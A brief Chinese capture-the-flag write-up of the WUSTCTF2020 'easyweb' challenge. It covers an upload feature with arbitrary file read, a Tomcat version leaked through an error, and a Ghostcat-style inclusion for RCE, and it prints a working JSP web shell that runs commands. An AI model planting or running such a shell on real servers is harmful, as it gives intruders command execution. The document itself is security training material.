[WUSTCTF2020]easyweb
解题步骤
打开题目一个文件上传。随便传一个东西,然后可以下载。发现可以任意文件读取,而且还能报错报路径
然后读了半天,啥有用的东西都没有读到。然后尝试打开上传的jsp马,然后报错得到了tomcat版本:
这个版本有漏洞,直接上幽灵猫进行jsp马包含rce:
这里不懂为啥连不上8009端口,导致buu无法复现,还是太菜了。。。
这里贴一下jsp马:
<% java.io.InputStream in = Runtime.getRuntime().exec("ls -al /").getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); %>
然后就可以进行代码执行了。